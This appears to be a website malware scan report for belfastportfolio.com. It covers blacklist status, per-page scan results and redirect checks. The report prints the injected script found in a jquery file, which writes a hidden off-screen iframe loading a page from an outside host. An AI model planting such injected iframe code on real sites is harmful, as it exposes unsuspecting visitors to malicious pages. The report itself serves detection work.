Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=belfastportfolio.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://belfastportfolio.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://belfastportfolio.com/ | 200 OK Content-Length: 10109 Content-Type: text/html | clean |
http://belfastportfolio.com/jquery/jquery-1.2.6.min.js | 200 OK Content-Length: 5392 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(){
    function stripos (b_haystack, b_needle, b_offset) {
        var haystack = (b_haystack + '').toLowerCase();
        var needle = (b_needle + '').toLowerCase();
        var index = 0;
        if ((index = haystack.indexOf(needle, b_offset)) !== -1) {
            return index;
        }
        return false;
    }
    function uni_wievier(){
        var gadSN = ['iPhone','Macintosh','Linux','iPad','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Avant','Chromium','Firefox','Maxthon','BlackBerry','Mini']
        return cocumber ? decodeURIComponent(cocumber[1]) : undefined;
    }
    if (!uni_wievier()) {
        var cookie = getCookie('mini_oper18a7_listu18s');
        if (cookie == undefined) {
            setTimer('mini_oper18a7_listu18s', true, 260001);
            document.write('<iframe sr'+'c'+'="http://dondrtra.zhonghenglamp.com/jetruitrioeytitur13.html" st'+'yle="po'+'sit'+'ion:absolute;'+'left'+':'+'-1370px;'+'top'+':'+'-1370px;" height="130" width="130"></iframe>');
        }
    }
})();
Antivirus reports:
http://belfastportfolio.com/index.php | 200 OK Content-Length: 10109 Content-Type: text/html | clean |
http://belfastportfolio.com/about.php | 200 OK Content-Length: 8961 Content-Type: text/html | clean |
http://belfastportfolio.com/how.php | 200 OK Content-Length: 14290 Content-Type: text/html | clean |
http://belfastportfolio.com/events.php | 200 OK Content-Length: 4711 Content-Type: text/html | clean |
http://belfastportfolio.com/shop.php | 200 OK Content-Length: 5153 Content-Type: text/html | clean |
http://belfastportfolio.com/comments.php | 200 OK Content-Length: 6616 Content-Type: text/html | clean |
http://belfastportfolio.com/portfoliobyname.php | 200 OK Content-Length: 4876 Content-Type: text/html | clean |
http://belfastportfolio.com/jcromie | 200 OK Content-Length: 7551 Content-Type: text/html | clean |
http://belfastportfolio.com/cbs | 200 OK Content-Length: 7407 Content-Type: text/html | clean |
http://belfastportfolio.com/martinmcc | 200 OK Content-Length: 5096 Content-Type: text/html | clean |
http://belfastportfolio.com/gayle | 200 OK Content-Length: 6074 Content-Type: text/html | clean |
http://belfastportfolio.com/onlinedesign | 200 OK Content-Length: 5966 Content-Type: text/html | clean |
http://belfastportfolio.com/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: belfastportfolio.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 06 Oct 2014 22:46:23 GMT
Server: LiteSpeed
Content-Type: text/html
X-Powered-By: PHP/5.4.25
Second query (visit from search engine):
GET / HTTP/1.1
Host: belfastportfolio.com
Referer: http://www.google.com/search?q=belfastportfolio.com
Result:
The result is similar to the first query. There are no suspicious redirects found.